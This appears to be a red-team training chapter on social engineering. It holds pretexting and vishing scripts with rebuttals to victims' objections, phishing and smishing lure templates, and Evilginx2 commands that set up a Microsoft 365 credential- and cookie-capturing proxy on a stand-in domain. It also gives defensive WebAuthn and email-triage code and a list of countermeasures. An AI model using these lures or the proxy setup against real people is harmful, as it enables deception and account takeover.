Social Engineering: Hacking Humans

The art of manipulating people to bypass security controls

The Human Factor

Technical controls keep improving. Firewalls, EDR, MFA—all getting better. But humans? We're still running the same vulnerable wetware we had 10,000 years ago. Social engineering exploits trust, authority, urgency, and helpfulness. Intelligence gathered via OSINT makes these attacks devastatingly effective.

Psychological Principles

All social engineering exploits predictable human psychology. Robert Cialdini's principles of influence are the foundation:

┌─────────────────────────────────────────────────────────────────────────────┐
│                    CIALDINI'S PRINCIPLES OF INFLUENCE                       │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│  AUTHORITY                              URGENCY/SCARCITY                    │
│  ═════════                              ════════════════                    │
│  "IT Security Team requires..."         "Your account will be locked        │
│  "CEO has requested..."                  in 24 hours unless..."             │
│  People obey authority figures          Fear of missing out drives action   │
│                                                                             │
│  SOCIAL PROOF                           RECIPROCITY                         │
│  ════════════                           ═══════════                         │
│  "Everyone in your department           "I helped you last week,            │
│   has already completed..."              now I need a small favor..."       │
│  We follow what others do               We feel obligated to return favors  │
│                                                                             │
│  LIKING                                 COMMITMENT/CONSISTENCY              │
│  ══════                                 ══════════════════════              │
│  Build rapport before the ask           "You said you'd help..."            │
│  Mirror speech patterns, find           Once we commit, we follow through   │
│  common ground                          Start small, escalate               │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘

Pretexting: The Art of the Story

A pretext is the story you tell—who you are, why you're calling, why your request is legitimate. Good pretexts are researched, rehearsed, and realistic.

Building Effective Pretexts

PRETEXT DEVELOPMENT FRAMEWORK:

1. ROLE SELECTION
   WHO are you pretending to be?
   • Internal: IT support, HR, executive assistant, new employee
   • External: Vendor, auditor, delivery person, utility worker
   • Choose role that explains your access request

2. BACKGROUND RESEARCH
   Make your story bulletproof with OSINT:
   • Real department names, manager names
   • Recent company events (merger, office move, audit)
   • Technology they use (Office 365, Salesforce, etc.)
   • Jargon and acronyms specific to company

3. MOTIVATION
   WHY are you making this request?
   • Deadline pressure: "Report due to board tomorrow"
   • Problem-solving: "Trying to fix issue before boss notices"
   • Routine task: "Annual compliance check"

4. AUTHORITY CHAIN
   Who sent you? Who can verify?
   • Name-drop real executives (from LinkedIn)
   • Reference real projects or initiatives
   • Create sense of escalation path

5. OBJECTION HANDLING
   Anticipate pushback:
   • "Let me verify with IT" → "John Smith approved it"
   • "I need to check policy" → "Time-sensitive, can we expedite?"
   • "Can you email instead?" → "System issues, that's why I'm calling"

Common Pretext Scenarios

IT Support

"Hi, this is Mike from IT. We're seeing some unusual activity on your account..."

HR / Benefits

"This is Sarah from HR. There's an issue with your direct deposit that needs immediate attention..."

Executive Assistant

"I'm calling on behalf of [CEO name]. He needs access to [system] for an urgent board meeting..."

Vendor Support

"This is Microsoft support. We've detected malware on your system and need remote access to fix it..."

Phishing: Digital Deception

Phishing remains one of the most common initial access vectors. Success depends on convincing targets to click, download, or enter credentials.

Phishing Email Anatomy

EFFECTIVE PHISHING EMAIL COMPONENTS:

FROM: spoofed-sender@legitimatelooking.com
      ├── Display name matches expected sender
      ├── Domain looks legitimate (typosquatting, homoglyphs such as rn for m)
      └── Directly forging the real domain fails SPF/DKIM/DMARC wherever the owner
          enforces them, so attackers register a lookalike domain they control,
          publish valid SPF/DKIM for it, and let the display name do the deceiving

SUBJECT: Creates urgency or curiosity
      ├── "Urgent: Your account will be suspended"
      ├── "Action Required: Verify your information"
      ├── "You have (1) new document to review"
      └── "[Company] Password Reset Request"

BODY:
      ├── Professional appearance (logos, formatting)
      ├── Urgency language ("immediately", "within 24 hours")
      ├── Fear trigger ("security breach", "unauthorized access")
      ├── Authority reference (CEO, IT, HR)
      ├── Minimal grammar/spelling errors
      └── Call to action (click link, open attachment)

LINK/PAYLOAD:
      ├── Credential harvesting page (fake login)
      ├── Malicious attachment (macro-enabled doc)
      ├── Drive-by download page
      └── OAuth consent phishing

Credential Harvesting Pages

Fake login pages that capture credentials. Tools like Evilginx2 and Modlishka go further: they act as reverse proxies to the real site, capturing credentials AND the session cookies issued after login in real time, which defeats OTP, SMS and push-based MFA.

Evilginx2 - MFA Bypass Proxy

# Evilginx2 sits between the victim and the real site as a reverse proxy
# Captures credentials AND session cookies in real time

: phishlets hostname microsoft365 login.evilphish.com
: phishlets enable microsoft365
: lures create microsoft365
: lures get-url 0

# Victim visits: https://login.evilphish.com/xyz
# Sees the real Microsoft login page (proxied through the attacker's domain)
# Enters credentials + MFA code, which the proxy relays to the real site
# Evilginx captures the session cookies the real site sets after MFA succeeds
# Attacker imports the cookies into a browser and holds a valid authenticated session

MFA is Not Enough

Reverse-proxy phishing defeats OTP, SMS and push-based MFA: the user completes the challenge against the real site through the proxy, and the attacker captures the session cookie issued afterwards. Only phishing-resistant MFA stops it. FIDO2/WebAuthn (hardware keys or platform passkeys) binds each signed assertion to the origin the browser is actually on, so an assertion produced on the proxy's domain is rejected by the real site. Binding sessions to the device (conditional access on device compliance, token binding) limits what a stolen cookie is worth.
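The difference between an OTP and a WebAuthn assertion under a reverse proxy is easy to see in code. The following Python is an added example, not Evilginx2 code and not part of the original page: it models the relying-party checks on clientDataJSON and authenticatorData (ceremony type, challenge, origin, rpIdHash) and omits the signature verification against the registered public key that a real relying party also performs. The domain names are the page's example plus an assumed legitimate origin.

```python
"""Why a reverse proxy relays OTP/push MFA but not a WebAuthn assertion.

Added example, not code from Evilginx2 or the original page. Models only the origin
and RP-ID checks a relying party makes; the signature check over the registered public
key is omitted. Domain names are assumed/constructed.
"""
import base64
import hashlib
import json
import secrets

REAL_ORIGIN = "https://login.microsoftonline.com"  # assumed legitimate origin
REAL_RP_ID = "login.microsoftonline.com"
PHISH_ORIGIN = "https://login.evilphish.com"  # proxy domain from the page's example


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def browser_assertion(origin: str, challenge: bytes) -> tuple[bytes, bytes]:
    """What the browser builds for the authenticator to sign.

    The browser, not the page, fills in `origin` and derives the RP ID from it. A
    proxy in the middle cannot rewrite either field: both are generated client-side
    and covered by the authenticator's signature.
    """
    rp_id = origin.split("://", 1)[1]
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin}
    ).encode()
    # authenticatorData = SHA-256(rpId) || flags || signCount || ...
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + b"\x00\x00\x00\x00"
    return client_data, auth_data


def rp_verify(client_data: bytes, auth_data: bytes, expected_challenge: bytes,
              expected_origin: str, expected_rp_id: str) -> tuple[bool, str]:
    """Relying-party side of the WebAuthn authentication ceremony (origin/RP-ID steps)."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch (replay)"
    if cd.get("origin") != expected_origin:
        return False, f"origin mismatch: {cd.get('origin')}"
    if auth_data[:32] != hashlib.sha256(expected_rp_id.encode()).digest():
        return False, "rpIdHash mismatch"
    return True, "ok"


def totp_relayed_through_proxy(code: str) -> bool:
    """A TOTP/SMS code carries no notion of which site it was typed into, so the proxy
    forwards it unchanged and the real site accepts it. The format check here stands in
    for the RP's HMAC verification, which would equally succeed."""
    return code.isdigit() and len(code) == 6


def relay_attempt(victim_browser_origin: str) -> tuple[bool, str]:
    """Victim authenticates on a page served from `victim_browser_origin`; the proxy
    relays the real site's challenge in and the signed assertion back out. In a real
    browser the attempt fails even earlier, because the credential is scoped to the
    real RP ID and no credential exists for the proxy's domain."""
    challenge = secrets.token_bytes(32)  # issued by the real RP, relayed by the proxy
    client_data, auth_data = browser_assertion(victim_browser_origin, challenge)
    return rp_verify(client_data, auth_data, challenge, REAL_ORIGIN, REAL_RP_ID)


if __name__ == "__main__":
    print("TOTP relayed via proxy accepted:", totp_relayed_through_proxy("847291"))
    print("WebAuthn from the real origin:   ", relay_attempt(REAL_ORIGIN))
    print("WebAuthn relayed from the proxy: ", relay_attempt(PHISH_ORIGIN))
```

The relayed OTP is accepted because nothing in it names the site it was entered on; the relayed WebAuthn assertion is rejected at the origin check because the browser wrote login.evilphish.com into clientDataJSON and the authenticator signed over it.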

Vishing: Voice Phishing

Phone-based social engineering. Often more effective than email because real-time conversation builds trust and creates urgency.

VISHING CALL STRUCTURE:

OPENING (Build Rapport):
├── Friendly, professional tone
├── Reference internal knowledge (names, projects)
├── Establish legitimacy quickly
└── "Hi, this is [Name] from [Department]..."

PROBLEM STATEMENT (Create Urgency):
├── Present a problem that needs immediate action
├── Use fear: "security issue", "compliance violation"
├── Time pressure: "before end of day", "CEO is waiting"
└── "We've detected some unusual activity..."

THE ASK (Get What You Need):
├── Start small (verify information)
├── Escalate gradually (reset password, grant access)
├── Make it easy to say yes
└── "I just need to verify a few things..."

HANDLE OBJECTIONS:
├── "Let me check with my manager" → "This is time-sensitive"
├── "Can you send an email?" → "Systems are down, that's why I'm calling"
├── "What's your employee ID?" → Have one ready from OSINT
└── Always have a fallback story

CLOSE (Exit Gracefully):
├── Thank them for their help
├── Confirm action was taken
├── Leave no suspicion
└── "Thanks so much, you've been very helpful"

Caller ID Spoofing

VoIP services allow attackers to display any caller ID, so the call appears to come from the company's main number or IT helpdesk. STIR/SHAKEN attestation helps only where both carriers implement it and the handset surfaces the verdict, so a displayed number should never count as verification.

Smishing: SMS Phishing

Text message phishing exploits the trust people place in SMS and the limited screen space that hides suspicious URLs.

COMMON SMISHING TEMPLATES:

DELIVERY NOTIFICATION:
"Your package could not be delivered.
Reschedule here: bit.ly/xyz123"

BANK ALERT:
"[Bank]: Unusual activity detected on your account.
Verify immediately: secure-verify.com/bank"

MFA CODE REQUEST:
"Your verification code is 847291.
If you didn't request this, secure your account: acct-secure.co"

CORPORATE:
"[Company] IT: Your VPN certificate expires today.
Renew now to avoid disruption: vpn-renew.co/corp"

Physical Social Engineering

In-person techniques covered in detail in Physical Red Team. Key approaches include:

Tailgating

Following authorized person through secured door. "Hands full" technique works well.

Impersonation

Vendor, IT support, delivery person. Uniform + clipboard = access.

USB Drops

Leave infected USB drives in parking lots and common areas. In a published campus field study, an estimated 45-98% of dropped drives were picked up and plugged in.

Dumpster Diving

Organizational intel from trash. Org charts, passwords on sticky notes.

Detection & Defense

Defensive Measures

Technical controls help but human awareness is the primary defense against social engineering. Training should be continuous, not annual.

SOCIAL ENGINEERING DEFENSES:

TECHNICAL CONTROLS:
├── Email authentication (SPF, DKIM, DMARC at p=reject) plus content filtering
├── URL reputation checking
├── Attachment sandboxing
├── Phishing-resistant MFA (FIDO2/WebAuthn)
├── Caller ID validation (STIR/SHAKEN)
└── SMS link warnings

PROCESS CONTROLS:
├── Verification callbacks for sensitive requests
├── Out-of-band confirmation for wire transfers
├── No credential sharing over phone/email policy
├── Visitor management systems
└── Clean desk policy

HUMAN CONTROLS:
├── Security awareness training
├── Simulated phishing exercises
├── Report suspicious activity culture
├── Verify unexpected requests
└── "Trust but verify" mindset

DETECTION:
├── User-reported phishing (make it easy!)
├── Email header analysis
├── Link click tracking
├── Login anomaly detection
└── Voice call pattern analysis
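The "Email header analysis" item above and the phishing email anatomy earlier in the chapter can both be turned into a triage check. The following Python is an added example, not code from the original page or from any tool it names: it parses a constructed user-reported message, reads the spf/dkim/dmarc verdicts from Authentication-Results, flags display-name and Reply-To mismatches, and detects lookalike domains in the sender and in body links by combining a homoglyph table with an edit-distance check. TRUSTED_DOMAINS, HOMOGLYPHS and the distance threshold are assumptions to tune for your own environment.

```python
"""Triage a user-reported email: spf/dkim/dmarc verdicts, display-name and Reply-To
mismatches, and lookalike (typosquat / homoglyph) domains in the sender and links.

Added example, not code from the original page or any tool it names. SAMPLE_EMAIL is
constructed; TRUSTED_DOMAINS, HOMOGLYPHS and the distance threshold are assumptions.
"""
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Assumed: the organisation's own domain plus a vendor brand that is often impersonated.
TRUSTED_DOMAINS = ("example.com", "microsoft.com")

# Constructed sample. SPF and DKIM pass because the attacker owns the lookalike domain
# and published records for it; what is absent is any DMARC-aligned tie to the real brand.
SAMPLE_EMAIL = b"""\
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=rnicrosoft-support.com;
 dkim=pass header.d=rnicrosoft-support.com; dmarc=none header.from=rnicrosoft-support.com
From: "Microsoft Account Team" <security@rnicrosoft-support.com>
Reply-To: helpdesk@acct-secure.co
To: victim@example.com
Subject: Urgent: Your account will be suspended
Content-Type: text/plain; charset=utf-8

Unusual sign-in activity was detected. Verify within 24 hours:
https://login.rnicrosoft-support.com/verify
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Visually confusable sequences seen in lookalike domains (assumed table; extend as needed).
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize_label(label: str) -> str:
    """Collapse homoglyph sequences so 'rnicrosoft' compares equal to 'microsoft'."""
    label = label.lower()
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches one-character typosquats such as 'micosoft'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain `domain` imitates, or None. The second-level label and
    each hyphen-separated token of it are compared against every trusted brand label."""
    domain = domain.lower().rstrip(".")
    if domain in trusted:
        return None
    labels = domain.split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    for t in trusted:
        brand = t.split(".")[-2]
        if any(edit_distance(normalize_label(tok), brand) <= 1 for tok in sld.split("-")):
            return t
    return None


def auth_results(msg) -> dict:
    """Parse spf/dkim/dmarc verdicts. Trust only the header stamped by your own MX: an
    attacker can pre-insert a forged Authentication-Results header."""
    out = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for method, verdict in AUTH_RE.findall(str(hdr)):
            out[method.lower()] = verdict.lower()
    return out


def analyze(raw: bytes) -> dict:
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    name, addr = parseaddr(str(msg["From"] or ""))
    from_domain = addr.rsplit("@", 1)[-1].lower()
    _, reply_addr = parseaddr(str(msg["Reply-To"] or ""))
    reply_domain = reply_addr.rsplit("@", 1)[-1].lower() if reply_addr else None
    auth = auth_results(msg)
    findings = []
    if auth.get("dmarc") != "pass":
        findings.append(f"DMARC verdict for {from_domain}: {auth.get('dmarc', 'absent')}")
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    if (t := lookalike_of(from_domain)):
        findings.append(f"From domain {from_domain} is a lookalike of {t}")
    for t in TRUSTED_DOMAINS:  # brand named in the display name but not in the address
        if t.split(".")[-2] in name.lower() and from_domain != t:
            findings.append(f"Display name '{name}' claims {t} but address is {addr}")
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part else ""
    for host in URL_HOST_RE.findall(body):
        if (t := lookalike_of(host)):
            findings.append(f"Link host {host} is a lookalike of {t}")
    return {"from_domain": from_domain, "reply_to_domain": reply_domain,
            "auth": auth, "findings": findings}


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EMAIL)["findings"]:
        print("-", finding)
```

Note what the sample shows: spf=pass and dkim=pass prove only that the mail really came from the lookalike domain, which the attacker controls. The useful signals are the missing DMARC alignment with the brand named in the display name, the Reply-To pointing somewhere else, and the homoglyph in the domain itself, which is why the check normalizes the label before measuring edit distance.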

MITRE ATT&CK Mapping

T1566.001

Spearphishing Attachment - Malicious files via email (Initial Access)

T1566.002

Spearphishing Link - Malicious links to credential harvesting (Initial Access)

T1566.004

Spearphishing Voice - Vishing for initial access

T1598.001

Spearphishing Service - Phishing for information via third-party services (Reconnaissance; T1598.004 is the voice variant)

Tools & Resources

Evilginx2

MFA-bypassing reverse proxy phishing framework. Captures session tokens.

GoPhish

Open-source phishing toolkit for security awareness testing.

SET

Social-Engineer Toolkit (TrustedSec). Credential harvesting, payload delivery.

King Phisher

Phishing campaign toolkit with tracking and reporting.